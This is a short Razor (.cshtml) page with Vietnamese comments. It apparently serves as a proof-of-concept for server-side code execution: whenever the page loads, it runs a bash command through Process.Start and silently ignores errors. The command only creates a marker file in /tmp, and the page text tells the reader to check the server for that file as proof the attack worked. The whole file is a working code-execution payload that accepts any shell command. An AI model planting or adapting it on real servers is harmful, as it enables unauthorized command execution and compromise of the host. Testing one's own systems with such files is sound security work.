@using System.Diagnostics
@{
    // Tự động tạo file hacked_success trong /tmp khi file này được load
    try {
        Process.Start("/bin/bash", "-c 'touch /tmp/cshtml_da_chay_thanh_cong'");
    } catch {}
}

<h1>Code execution attempted!</h1>
<p>Hãy vào server kiểm tra folder /tmp xem có file 'cshtml_da_chay_thanh_cong' chưa.</p>
